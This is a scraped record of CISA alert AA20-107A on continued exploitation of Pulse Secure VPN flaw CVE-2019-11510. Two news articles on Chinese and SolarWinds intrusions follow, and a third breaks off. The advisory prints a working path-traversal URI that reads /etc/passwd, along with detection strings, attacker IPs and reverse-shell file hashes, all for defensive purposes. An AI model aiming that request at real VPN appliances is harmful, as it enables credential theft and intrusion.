See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v7/matrices/enterprise/> \"Enterprise Matrix\" ) framework for all referenced threat actor techniques and mitigations._\n\nThis Alert provides an update to Cybersecurity and Infrastructure Security Agency (CISA) [Alert AA20-010A: Continued Exploitation of Pulse Secure VPN Vulnerability](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-010a> \"Continued Exploitation of Pulse Secure VPN Vulnerability\" ), which advised organizations to immediately patch CVE-2019-11510\u2014an arbitrary file reading vulnerability affecting Pulse Secure virtual private network (VPN) appliances.[[1]](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101> \"Pulse Secure Community\" ) CISA is providing this update to alert administrators that threat actors who successfully exploited CVE-2019-11510 and stole a victim organization\u2019s credentials will still be able to access\u2014and move laterally through\u2014that organization\u2019s network after the organization has patched this vulnerability if the organization did not change those stolen credentials.\n\nThis Alert provides new detection methods for this activity, including a [CISA-developed tool](<https://github.com/cisagov/check-your-pulse> \"cisagov / check-your-pulse\" ) that helps network administrators search for indicators of compromise (IOCs) associated with exploitation of CVE-2019-11510. This Alert also provides mitigations for victim organizations to recover from attacks resulting from CVE-2019-11510. CISA encourages network administrators to remain aware of the ramifications of exploitation of CVE-2019-11510 and to apply the detection measures and mitigations provided in this report to secure networks against these attacks.\n\nFor a downloadable copy of IOCs, see STIX file.\n\n#### **Background**\n\nCISA has conducted multiple incident response engagements at U.S. 
Government and commercial entities where malicious cyber threat actors have exploited CVE-2019-11510\u2014an arbitrary file reading vulnerability affecting Pulse Secure VPN appliances\u2014to gain access to victim networks. Although Pulse Secure released patches for CVE-2019-11510 in April 2019,[[2]](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101> \"Pulse Secure Community\" ) CISA has observed incidents where compromised Active Directory credentials were used months after the victim organization patched their VPN appliance.\n\n### Technical Details\n\nCISA determined that cyber threat actors have been able to obtain plaintext Active Directory credentials after gaining _Initial Access_ [[TA0001]](<https://attack.mitre.org/versions/v7/tactics/TA0001/> \"Initial Access\" ) to a victim organization\u2019s network via VPN appliances. Cyber threat actors used these _Valid Accounts_ [[T1078]](<https://attack.mitre.org/versions/v7/techniques/T1078/> \"Valid Accounts\" ) in conjunction with:\n\n * _External Remote Services_ [[T1133]](<https://attack.mitre.org/versions/v7/techniques/T1133> \"External Remote Services\" ) for access,\n * _Remote Services_ [[T1021]](<https://attack.mitre.org/versions/v7/techniques/T1021> \"Remote Services\" ) for _Lateral Movement_ [[TA0008]](<https://attack.mitre.org/versions/v7/tactics/TA0008/> \"Lateral Movement\" ) to move quickly throughout victim network environments, and\n * _Data Encrypted for Impact_ [[T1486]](<https://attack.mitre.org/versions/v7/techniques/T1486> \"Data Encrypted for Impact\" ) for impact, as well as\n * _Exfiltration_ [[TA0010]](<https://attack.mitre.org/versions/v7/tactics/TA0010/> \"Exfiltration\" ) and sale of the data.\n\n### Initial Access\n\nCVE-2019-11510 is a pre-authentication arbitrary file read vulnerability affecting Pulse Secure VPN appliances. A remote attacker can exploit this vulnerability to request arbitrary files from a VPN server. 
The vulnerability occurs because directory traversal is hard coded to be allowed if the path contains `dana/html5acc/`.[[3]](<https://twitter.com/XMPPwocky/status/1164874297690611713/photo/1> \"Twitter\" ),[[4]](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?do=findComment&comment=848> \"184 Pulse Secure SSL VPN\" ) For example, a malicious cyber actor can obtain the contents of `/etc/passwd` [[5]](<https://github.com/BishopFox/pwn-pulse/blob/master/pwn-pulse.sh> \"BishopFox / pwn-pulse\" ) by requesting the following uniform resource identifier (URI):\n\n`https://vulnvpn.example[.]com/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/`\n\nObtaining the contents of `/etc/passwd` gives the attacker access to basic information about local system accounts. This request was seen in the proof of concept (POC) code for this exploit on [Github](<https://github.com/BishopFox/pwn-pulse/blob/master/pwn-pulse.sh> \"BishopFox / pwn-pulse\" ). An attacker can also leverage the vulnerability to access other files that are useful for remote exploitation. 
By requesting the data.mdb object, an attacker can leak plaintext credentials of enterprise users.[[6]](<https://www.exploit-db.com/exploits/47297> \"Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure \\(Metasploit\\)\" ),[[7]](<https://twitter.com/alyssa_herrera_/status/1164089995193225216?s=11> \"Twitter\" ),[[8]](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?do=findComment&comment=848> \"184 Pulse Secure SSL VPN Vulnerability Being Exploited in the Wild\" )\n\nOpen-source reporting indicates that cyber threat actors can exploit CVE-2019-11510 to retrieve encrypted passwords;[[9]](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?tab=comments#comment-887> \"184 Pulse Secure SSL VPN Vulnerability Being Exploited in the Wild\" ) however, CISA has not observed this behavior. By reviewing victim VPN appliance logs, CISA has noted cyber threat actors crafting requests that request files that allow for _Credential Dumping_ [[T1003]](<https://attack.mitre.org/versions/v7/techniques/T1003> \"OS Credential Dumping\" ) plaintext passwords from the VPN appliance.\n\n### Test Environment\n\nTo confirm the open-source reporting and validate what the cyber threat actors had access to, CISA used a test environment to send crafted requests. CISA used requests found both in proof-of-concept, open-source code and in requests from the logs of compromised victims. By doing so, CISA confirmed that plaintext Active Directory credentials were leaked and that it was possible to leak the local admin password to the VPN appliance. (See figure 1.)\n\n\n\n##### Figure 1: Exploitation of the VPN appliance leading to plaintext local admin credentials\n\nCISA\u2019s test environment consisted of a domain controller (DC) running Windows Server 2016, an attacker machine, and a Pulse Secure VPN appliance version 9.0R3 (build 64003). 
CISA connected the attacker machine to the external interface of the Pulse Secure VPN appliance and the DC to the internal interface.\n\nCISA created three accounts for the purpose of validating the ability to compromise them by exploiting CVE-2019-11510.\n\n * Local Pulse Secure Admin account \n * Username: `admin`; Password: `pulse-local-password`\n * Domain Administrator Account \n * Username: `Administrator`; Password: `domain-admin-password1`\n * CISA-test-user Account \n * Username: `cisa-test-user`; Password: `Use_s3cure_passwords`\n\nAfter creating the accounts, CISA joined the VPN appliance to the test environment domain, making a point not to cache the domain administrator password. (See figure 2.)\n\n\n\n##### Figure 2: VPN appliance joined to the domain without caching the domain administrator password\n\nCISA used a similar file inclusion to test the ability to _Credential Dump_ [[T1003]](<https://attack.mitre.org/versions/v7/techniques/T1003> \"OS Credential Dumping\" ) the domain administrator password. CISA determined it was possible to leak the domain administrator password that was used to join the device to the domain without saving the credentials. Refer to figure 3 for the URI string tested by CISA.\n\n\n\n##### Figure 3: Exploitation of the VPN appliance leading to cleartext domain admin credentials\n\nNext, CISA validated the ability to _Credential Dump_ [[T1003]](<https://attack.mitre.org/versions/v7/techniques/T1003> \"OS Credential Dumping\" ) a user password from the VPN appliance. To do this, CISA created a _user realm_ (Pulse Secure configuration terminology) and configured its roles/resource groups to allow for Remote Desktop Protocol (RDP) over HTML5 (Apache Guacamole). After using the new user to remotely access an internal workstation over RDP, CISA used a crafted request (see figure 4) to leak the credentials from the device. 
(**Note:** the path to stored credentials is publicly available.)[[10]](<https://twitter.com/alyssa_herrera_/status/1164089995193225216?s=11>)\n\n\n\n##### Figure 4: Exploitation of the VPN appliance leading to plaintext user credentials\n\nThis test confirmed CISA\u2019s suspicion that threat actors had access to each of the various compromised environments.\n\n### Cyber Threat Actor Behavior in Victim Network Environments\n\nCISA observed\u2014once credentials were compromised\u2014cyber threat actors accessing victim network environments via the Pulse Secure VPN appliances. Cyber threat actors used _Connection Proxies_ [[T1090]](<https://attack.mitre.org/versions/v7/techniques/T1090> \"Proxy\" )\u2014such as Tor infrastructure and virtual private servers (VPSs)\u2014to minimize the chance of detection when they connected to victim VPN appliances.\n\nUsing traditional host-based analysis, CISA identified the following malicious cyber actor actions occurring in a victim\u2019s environment:\n\n * Creating persistence via scheduled tasks/remote access trojans\n * Amassing files for exfiltration\n * Executing ransomware on the victim\u2019s network environment\n\nBy correlating these actions with the connection times and user accounts recorded in the victim\u2019s Pulse Secure `.access` logs, CISA was able to identify unauthorized threat actor connections to the victim\u2019s network environment. CISA was then able to use the source Internet Protocol (IP) addresses and user agents recorded for those connections to identify unauthorized connections to the network environments of other victims. Refer to the Indicators of Compromise section for the IP addresses CISA observed making these unauthorized connections.\n\nIn one case, CISA observed a cyber threat actor attempting to sell the stolen credentials after 30 unsuccessful attempts to connect to the customer environment to escalate privileges and drop ransomware. 
CISA has also observed this threat actor successfully dropping ransomware at hospitals and U.S. Government entities.\n\nIn other cases, CISA observed threat actors leveraging tools, such as LogMeIn and TeamViewer, for persistence. These tools would enable threat actors to maintain access to the victim\u2019s network environment if they lost their primary connection.\n\n### Initial Detection\n\nConventional antivirus and endpoint detection and response solutions did not detect this type of activity because the threat actors used legitimate credentials and remote services. \n\nAn intrusion detection system may have noticed the exploitation of CVE-2019-11510 if the sensor had visibility of the external interface of the VPN appliance (possible in a customer\u2019s demilitarized zone) and if appropriate rules were in place. Heuristics in centralized logging may have been able to detect logins from suspicious or foreign IPs, if configured.\n\n### Post-Compromise Detection and IOC Detection Tool\n\nGiven that organizations that have applied patches for CVE-2019-11510 may still be at risk from compromises that occurred before patching, CISA developed detection methods for organizations to determine if their patched VPN appliances have been targeted by the activity revealed in this report.\n\nTo detect past exploitation of CVE-2019-11510, network administrators should:\n\n 1. Turn on logging of unauthenticated requests (see figure 5). (**Note:** there is a risk of overwriting logs with unauthenticated requests so, if enabling this feature, be sure to frequently back up logs; if possible, use a remote syslog server.) \n\n\n\n##### Figure 5: Checkbox that enables logging exploit attacks\n\n 2. Check logs for exploit attempts. To detect lateral movement, system administrators should look in the logs for strings such as `../../../data` (see figure 6). \n\n\n\n##### Figure 6: Strings for detection of lateral movement\n\n 3. 
Manually review logs for unauthorized sessions and exploit attempts, especially sessions originating from unexpected geo-locations.\n 4. Run CISA\u2019s IOC detection tool. CISA developed a tool that enables administrators to triage logs (if authenticated request logging is turned on) and automatically search for IOCs associated with exploitation of CVE-2019-11510. CISA encourages administrators to visit [CISA\u2019s GitHub page](<https://github.com/cisagov/check-your-pulse> \"cisagov / check-your-pulse\" ) to download and run the tool. While not exhaustive, this tool may find evidence of attempted compromise.\n\n### Indicators of Compromise\n\nCISA observed IP addresses making unauthorized connections to customer infrastructure. (**Note:** these IPs were observed as recently as February 15, 2020.) The IP addresses seen making unauthorized connections to customer infrastructure were different than IP addresses observed during initial exploitation. Please see the STIX file below for IPs.\n\nCISA observed the following user agents with this activity:\n\n * Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0\n * Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0\n * Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55[.]0.2883.87 Safari/537.36\n\nCISA also observed:\n\n * A cyber threat actor renaming portable executable (PE) files in an attempt to subvert application allow listing or antivirus (AV) protections. 
See table 1 for hashes of files used.\n * A threat actor \u201cliving off the land\u201d and utilizing C:\\Python\\ArcGIS to house malicious PE files, as well as using natively installed Python.\n * Threat actor attack infrastructure: 38.68.36(dot)112 port 9090 and 8088\n\n##### Table 1: Filenames and hashes of files used by a threat actor\n\nFilename | MD5 \n---|--- \nt.py (tied to scheduled task, python meterpreter reverse shell port 9090) | 5669b1fa6bd8082ffe306aa6e597d7f5 \ng.py (tied to scheduled task, python meterpreter reverse shell port 8088) | 61eebf58e892038db22a4d7c2ee65579 \n \nFor a downloadable copy of IOCs, see STIX file.\n\n### Mitigations\n\nCISA strongly urges organizations that have not yet done so to upgrade their Pulse Secure VPN to the corresponding patches for CVE-2019-11510. If\u2014after applying the detection measures in this alert\u2014organizations detect evidence of CVE-2019-11510 exploitation, CISA recommends changing passwords for all Active Directory accounts, including administrator and service accounts.\n\nCISA also recommends that organizations:\n\n * Look for unauthorized applications and scheduled tasks in their environment.\n * Remove any remote access programs not approved by the organization.\n * Remove any remote access trojans.\n * Carefully inspect scheduled tasks for scripts or executables that may allow an attacker to connect to an environment.\n\nIf organizations find evidence of malicious, suspicious, or anomalous activity or files, they should consider reimaging the workstation or server and redeploying it into the environment. CISA recommends performing checks to ensure the infection is gone even if the workstation or host has been reimaged.\n\n### Contact Information\n\nTo report suspicious activity related to information found in this joint Cybersecurity Advisory, contact CISA\u2019s 24/7 Operations Center at report@cisa.gov or (888) 282-0870. 
When available, please include the information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.\n\n**References**\n\n[[1] Pulse Secure Advisory SA44101 ](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101> \"Pulse Secure Community\" )\n\n[[2] Pulse Secure Advisory SA44101](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101> \"Pulse Secure Community\" )\n\n[[3] Twitter. @XMPPwocky. (2019, August 23). Your least favorite construct ](<https://twitter.com/XMPPwocky/status/1164874297690611713/photo/1> \"XMPPwocky\" )\n\n[[4] OpenSecurity Forums. Public vulnerability discussion. (2019, August 23). ](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?do=findComment&comment=848> \"OpenSecurity Forums\" )\n\n[[5] GitHub. BishopFox / pwn-pulse. ](<https://github.com/BishopFox/pwn-pulse/blob/master/pwn-pulse.sh> \"BishopFox / pwn-pulse\" )\n\n[[6] File disclosure in Pulse Secure SSL VPN (Metasploit) ](<https://www.exploit-db.com/exploits/47297> \"Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure \\(Metasploit\\)\" )\n\n[[7] Twitter. @alyssa_herra ](<https://twitter.com/alyssa_herrera_/status/1164089995193225216?s=11> \"Twitter\" )\n\n[[8] OpenSecurity Forums. Public vulnerability discussion. (2019, August 23). ](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?do=findComment&comment=848> \"OpenSecurity Forums\" )\n\n[[9] OpenSecurity Forums. Public vulnerability discussion. (2019, August 31). ](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?tab=comments#comment-887> \"OpenSecurity Forums\" )\n\n[[10] Twitter. 
@alyssa_herra](<https://twitter.com/alyssa_herrera_/status/1164089995193225216?s=11> \"Twitter\" )\n\n### Revisions\n\nApril 16, 2020: Initial Version\n\nOctober 23, 2020: Revision\n\nSeptember 05, 2023: Revision\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-24T12:00:00", "type": "ics", "title": "Continued Threat Actor Exploitation Post Pulse Secure VPN Patching", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2020-10-24T12:00:00", "id": "AA20-107A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-107a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:40:09", "description": "[](<https://thehackernews.com/images/-S81ZTpL3VW0/X2CFi_g7l0I/AAAAAAAAAww/bXeyXz56F-0V-P2VhHdoO5qJllbhNqfswCLcBGAsYHQ/s728-e100/hacking.jpg>)\n\nThe US Cybersecurity and Infrastructure Security Agency (CISA) issued a [new advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-258a>) on Monday about a wave of cyberattacks carried by Chinese nation-state actors targeting US government agencies and private entities. 
\n \n\"CISA has observed Chinese [Ministry of State Security]-affiliated cyber threat actors operating from the People's Republic of China using commercially available information sources and open-source exploitation tools to target US Government agency networks,\" the cybersecurity agency said. \n \nOver the past 12 months, the victims were identified through sources such as [Shodan](<https://www.shodan.io/>), the Common Vulnerabilities and Exposure ([CVE](<https://cve.mitre.org/>)) database, and the National Vulnerabilities Database (NVD), exploiting the public release of a vulnerability to pick vulnerable targets and further their motives. \n \nBy compromising legitimate websites and leveraging spear-phishing emails with malicious links pointing to attacker-owned sites in order to gain initial access, the Chinese threat actors have deployed open-source tools such as [Cobalt Strike](<https://www.cobaltstrike.com/>), [China Chopper Web Shell](<https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html>), and [Mimikatz](<https://github.com/gentilkiwi/mimikatz>) credential stealer to extract sensitive information from infected systems. \n \nThat's not all. Taking advantage of the fact that organizations aren't quickly mitigating known software vulnerabilities, the state-sponsored attackers are \"targeting, scanning, and probing\" US government networks for unpatched flaws in F5 Networks Big-IP Traffic Management User Interface ([CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)), Citrix VPN ([CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)), Pulse Secure VPN ([CVE-2019-11510](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>)), and Microsoft Exchange Servers ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)) to compromise targets. 
\n \n\"Cyber threat actors also continue to identify large repositories of credentials that are available on the internet to enable brute-force attacks,\" the agency said. \"While this sort of activity is not a direct result of the exploitation of emergent vulnerabilities, it demonstrates that cyber threat actors can effectively use available open-source information to accomplish their goals.\" \n \nThis is not the first time Chinese actors have worked on behalf of China's MSS to infiltrate various industries across the US and other countries. \n \nIn July, the US Department of Justice (DoJ) [charged two Chinese nationals](<https://thehackernews.com/2020/07/chinese-hackers-covid19.html>) for their alleged involvement in a decade-long hacking spree spanning high tech manufacturing, industrial engineering, defense, educational, gaming software, and pharmaceutical sectors with an aim to steal trade secrets and confidential business information. \n \nBut it's not just China. Earlier this year, Israeli security firm ClearSky uncovered a cyberespionage campaign dubbed \"[Fox Kitten](<https://thehackernews.com/2020/02/iranian-hackers-vpn-vulnerabilities.html>)\" that targeted government, aviation, oil and gas, and security companies by exploiting unpatched VPN vulnerabilities to penetrate and steal information from target companies, prompting CISA to issue [multiple security alerts](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>) urging businesses to secure their VPN environments. 
\n \nStating that sophisticated cyber threat actors will continue to use open-source resources and tools to single out networks with low-security posture, CISA has recommended organizations to patch [routinely exploited vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>), and \"audit their configuration and patch management programs to ensure they can track and mitigate emerging threats.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-15T09:14:00", "type": "thn", "title": "CISA: Chinese Hackers Exploiting Unpatched Devices to Target U.S. Agencies", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-5902"], "modified": "2020-09-15T09:14:30", "id": "THN:0E6CD47141AAF54903BD6C1F9BD96F44", "href": "https://thehackernews.com/2020/09/chinese-hackers-agencies.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:41", "description": 
"[](<https://thehackernews.com/images/-Cpd5jYOBXGk/X9b7WId_6xI/AAAAAAAABPY/RSyw2zajv6MRRJNaCspQPEerTW8vEpNpACLcBGAsYHQ/s0/solarwinds.jpg>)\n\nState-sponsored actors allegedly working for Russia have [targeted](<https://www.washingtonpost.com/national-security/russian-government-spies-are-behind-a-broad-hacking-campaign-that-has-breached-us-agencies-and-a-top-cyber-firm/2020/12/13/d5a53b88-3d7d-11eb-9453-fc36ba051781_story.html>) the US Treasury, the Commerce Department's National Telecommunications and Information Administration (NTIA), and other government agencies to [monitor internal email traffic](<https://www.reuters.com/article/us-usa-cyber-amazon-com-exclsuive/exclusive-u-s-treasury-breached-by-hackers-backed-by-foreign-government-sources-idUSKBN28N0PG>) as part of a widespread cyberespionage campaign.\n\nThe Washington Post, citing unnamed sources, said the latest attacks were the work of APT29 or Cozy Bear, the same hacking group that's believed to have orchestrated a breach of US-based cybersecurity firm [FireEye](<https://thehackernews.com/2020/12/cybersecurity-firm-fireeye-got-hacked.html>) a few days ago leading to the theft of its Red Team penetration testing tools.\n\nThe motive and the full scope of what intelligence was compromised remains unclear, but signs are that adversaries tampered with a software update released by Texas-based IT infrastructure provider SolarWinds earlier this year to infiltrate the systems of government agencies as well as FireEye and mount a highly-sophisticated [supply chain attack](<https://en.wikipedia.org/wiki/Supply_chain_attack>).\n\n\"The compromise of SolarWinds' Orion Network Management Products poses unacceptable risks to the security of federal networks,\" said Brandon Wales, acting director of the US Cybersecurity and Infrastructure Security Agency (CISA), which has [released](<https://www.cisa.gov/news/2020/12/13/cisa-issues-emergency-directive-mitigate-compromise-solarwinds-orion-network>) an emergency 
directive, urging federal civilian agencies to review their networks for suspicious activity and disconnect or power down SolarWinds Orion products immediately.\n\nSolarWinds' networking and security products are used by more than [300,000 customers worldwide](<https://www.solarwinds.com/company/customers>), including Fortune 500 companies, government agencies, and education institutions.\n\nIt also serves several major US telecommunications companies, all five branches of the US Military, and other prominent government organizations such as the Pentagon, State Department, NASA, National Security Agency (NSA), Postal Service, NOAA, Department of Justice, and the Office of the President of the United States.\n\n### An Evasive Campaign to Distribute SUNBURST Backdoor\n\nFireEye, which is tracking the ongoing intrusion campaign under the moniker \"[UNC2452](<https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html>),\" said the supply chain attack takes advantage of trojanized SolarWinds Orion business software updates in order to distribute a backdoor called SUNBURST.\n\n\"This campaign may have begun as early as Spring 2020 and is currently ongoing,\" FireEye said in a Sunday analysis. \"Post compromise activity following this supply chain compromise has included lateral movement and data theft. 
The campaign is the work of a highly skilled actor and the operation was conducted with significant operational security.\"\n\n[](<https://thehackernews.com/images/-PbITJeTtDpo/X9b7oJ1VO6I/AAAAAAAABPg/V3gShVN1NtYYFwAKCmwfQuhQjkNYMDgQgCLcBGAsYHQ/s0/solarwinds-backdoor.jpg>)\n\nThis rogue version of SolarWinds Orion plug-in, besides masquerading its network traffic as the Orion Improvement Program ([OIP](<https://support.solarwinds.com/SuccessCenter/s/article/Orion-Improvement-Program?language=en_US>)) protocol, is said to communicate via HTTP to remote servers so as to retrieve and execute malicious commands (\"Jobs\") that cover the spyware gamut, including those for transferring files, executing files, profiling and rebooting the target system, and disabling system services.\n\nOrion Improvement Program or OIP is chiefly used to collect performance and usage statistics data from SolarWinds users for product improvement purposes.\n\nWhat's more, the IP addresses used for the campaign were obfuscated by VPN servers located in the same country as the victim to evade detection.\n\nMicrosoft also corroborated the findings in a separate analysis, stating the attack (which it calls \"[Solorigate](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/Solorigate.C!dha&ThreatID=2147771132>)\") leveraged the trust associated with SolarWinds software to insert malicious code as part of a larger campaign.\n\n\"A malicious software class was included among many other legitimate classes and then signed with a legitimate certificate,\" the Windows maker said. 
\"The resulting binary included a backdoor and was then discreetly distributed into targeted organizations.\"\n\n### SolarWinds Releases Security Advisory\n\nIn a [security advisory](<https://www.solarwinds.com/securityadvisory>) published by SolarWinds, the company said the attack targets versions 2019.4 through 2020.2.1 of the SolarWinds Orion Platform software that was released between March and June 2020, and recommended that users upgrade to Orion Platform release 2020.2.1 HF 1 immediately.\n\nThe firm, which is currently investigating the attack in coordination with FireEye and the US Federal Bureau of Investigation, is also expected to release an additional hotfix, 2020.2.1 HF 2, on December 15, which replaces the compromised component and provides several extra security enhancements.\n\nFireEye last week disclosed that it fell victim to a highly sophisticated foreign-government attack that compromised its software tools used to test the defenses of its customers.\n\nTotaling as many as [60 in number](<https://www.picussecurity.com/resource/blog/techniques-tactics-procedures-utilized-by-fireeye-red-team-tools>), the stolen Red Team tools are a mix of publicly available tools (43%), modified versions of publicly available tools (17%), and those that were developed in-house (40%).\n\nFurthermore, the theft also includes exploit payloads that leverage critical vulnerabilities in Pulse Secure SSL VPN (CVE-2019-11510), Microsoft Active Directory (CVE-2020-1472), Zoho ManageEngine Desktop Central (CVE-2020-10189), and Windows Remote Desktop Services (CVE-2019-0708).\n\nThe campaign, ultimately, appears to be a supply chain attack on a global scale, for FireEye said it detected this activity across several entities worldwide, spanning government, consulting, technology, telecom, and extractive firms in North America, Europe, Asia, and the Middle East.\n\nThe indicators of compromise (IoCs) and other relevant attack signatures designed to counter SUNBURST can be 
accessed [here](<https://github.com/fireeye/sunburst_countermeasures>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-12-14T05:44:00", "type": "thn", "title": "US Agencies and FireEye Were Hacked Using SolarWinds Software Backdoor", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0708", "CVE-2019-11510", "CVE-2020-10189", "CVE-2020-1472"], "modified": "2020-12-14T12:54:22", "id": "THN:E9454DED855ABE5718E4612A2A750A98", "href": "https://thehackernews.com/2020/12/us-agencies-and-fireeye-were-hacked.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T03:29:54", "description": 
"[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjhNJNYKsz0zRz-CzaUqAm2MRgt6hyl7sq05Q-XnbDm2VwMedx339MqSyZOAKaZNIywGOU7b4usV_c7PkobISvqG4n1OWRAK6MowARD4h2L_HH0soDHDxo-HLg5bT1n0PRyLyda5DamIal3W2BOTcPpLYlDUc8cUHZ5tqR_YBCcyTEpn2SBhSPC2m-r/s728-e100/flaws.gif>)\n\n[Log4Shell](<https://thehackernews.com/2021/12/new-apache-log4j-update-released-to.html>), [ProxyShell](<https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html>), [ProxyLogon](<https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html>), [ZeroLogon](<https://thehackernews.com/2020/09/detecting-and-preventing-critical.html>), and flaws in [Zoho ManageEngine AD SelfService Plus](<https://thehackernews.com/2021/09/cisa-warns-of-actively-exploited-zoho.html>), [Atlassian Confluence](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>), and [VMware vSphere Client](<https://thehackernews.com/2021/02/critical-rce-flaw-affects-vmware.html>) emerged as some of the top exploited security vulnerabilities in 2021.\n\nThat's according to a \"[Top Routinely Exploited Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>)\" report released by cybersecurity authorities from the Five Eyes nations Australia, Canada, New Zealand, the U.K., and the U.S.\n\nOther frequently weaponized flaws included a remote code execution bug in Microsoft Exchange Server ([CVE-2020-0688](<https://thehackernews.com/2021/07/top-30-critical-security.html>)), an arbitrary file read vulnerability in Pulse Secure Pulse Connect Secure 